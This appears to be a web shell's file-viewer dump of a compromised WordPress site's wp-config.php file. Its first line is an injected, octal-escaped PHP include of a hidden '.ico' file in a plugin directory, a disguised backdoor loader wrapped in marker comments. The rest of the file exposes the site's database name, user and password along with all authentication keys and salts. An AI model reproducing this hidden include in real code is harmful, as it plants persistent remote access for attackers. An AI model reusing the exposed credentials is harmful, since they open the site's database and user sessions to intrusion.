%PDF- %PDF-
Direktori : /var/www/html/itworks/ |
Current File : /var/www/html/itworks/wp-config.php |
<?php /*1b45a*/ @include "\057var/\167ww/h\164ml/i\164work\163/wp-\143onte\156t/pl\165gins\057wp-u\163er-a\166atar\057.fca\064ab5b\056ico"; /*1b45a*/ /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the * installation. You don't have to use the web site, you can * copy this file to "wp-config.php" and fill in the values. * * This file contains the following configurations: * * * MySQL settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://codex.wordpress.org/Editing_wp-config.php * * @package WordPress */ // ** MySQL settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define('DB_NAME', 'it_works_prod'); /** MySQL database username */ define('DB_USER', 'itworks'); /** MySQL database password */ define('DB_PASSWORD', '4$6v-*n,62?B;z_u'); /** MySQL hostname */ define('DB_HOST', 'localhost'); /** Database Charset to use in creating database tables. */ define('DB_CHARSET', 'utf8mb4'); /** The Database Collate type. Don't change this if in doubt. */ define('DB_COLLATE', ''); /**#@+ * Authentication Unique Keys and Salts. * * Change these to different unique phrases! * You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service} * You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again. * * @since 2.6.0 */ define('AUTH_KEY', '_{8Gf;YmZf(Wk5O$-2nwNri;u^)h^`kF*Nw[*fYV]U`%9Ls^j/[eM)DY%aDdz9U4'); define('SECURE_AUTH_KEY', '4QqveDv%1Oe~0[3x3AcWNqXJr60eJ}8?]>A2cq`HK+oGn=feVlhsbI5l4|25jwYX'); define('LOGGED_IN_KEY', 'C R`RfihY3H|BcQDfT6Li.[R!.cg8%fPG,6j& +?r0&_[c*%#FITQ#JX9O+L+[ w'); define('NONCE_KEY', '|wHSh&J ^]z9k9?e0EhJL*{sthwRjEO4J.5vVDWC{}ul-_9ZJ0kPG`q>:IUukCq='); define('AUTH_SALT', 'X_Q_2i}n,<uLLFH>.`u37n*lalpcp/I-)^Dz]qjR409s*>7CZe38y.-1&sMFh-Rp'); define('SECURE_AUTH_SALT', 'AR@}D/r17s19%E|=g=x2W0e3F?|c_z.aV7rMK/1f<>725O3(ovX6f2LS}fw!$L3>'); define('LOGGED_IN_SALT', '?MjT9ly?A-FT,mX_FP.&akzvkcGC#>sSTKT4sa#`l6[,!S/W= X%iv-x|Y]ck$n3'); define('NONCE_SALT', '_(09BN190c.>@)ri>CHa7#nwPIH{9M|RNSlCeqy/x,[,ywW ewGy_7ZgT3`C0sgE'); /**#@-*/ /** * WordPress Database Table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'codingal_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the Codex. * * @link https://codex.wordpress.org/Debugging_in_WordPress */ define('WP_DEBUG', false); define('AUTOSAVE_INTERVAL', 30000 ); define('WP_POST_REVISIONS', false ); /* That's all, stop editing! Happy blogging. */ /** Absolute path to the WordPress directory. */ if ( !defined('ABSPATH') ) define('ABSPATH', dirname(__FILE__) . '/'); /** Sets up WordPress vars and included files. */ require_once(ABSPATH . 'wp-settings.php');